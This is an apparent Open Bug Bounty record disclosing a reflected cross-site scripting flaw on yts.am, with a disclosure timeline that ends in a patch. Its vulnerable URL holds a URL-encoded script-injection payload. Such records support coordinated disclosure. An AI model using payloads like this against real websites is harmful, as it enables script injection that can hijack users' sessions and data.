yts.am XSS vulnerability

2017-12-12T01:34:00
ID OBB:452293
Type openbugbounty
Reporter N008137
Modified 2018-01-14T07:47:00

Description

Vulnerable URL:
https://yts.am/browse-movies/%22%3E%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e/all/all/0/latest
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1554
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 December, 2017 01:34 GMT
Generic security notifications sent to website owner| 12 December, 2017 01:37 GMT
Vulnerability details disclosed by researcher| 13 January, 2018 16:32 GMT
Vulnerability patched by the website owner| 14 January, 2018 07:47 GMT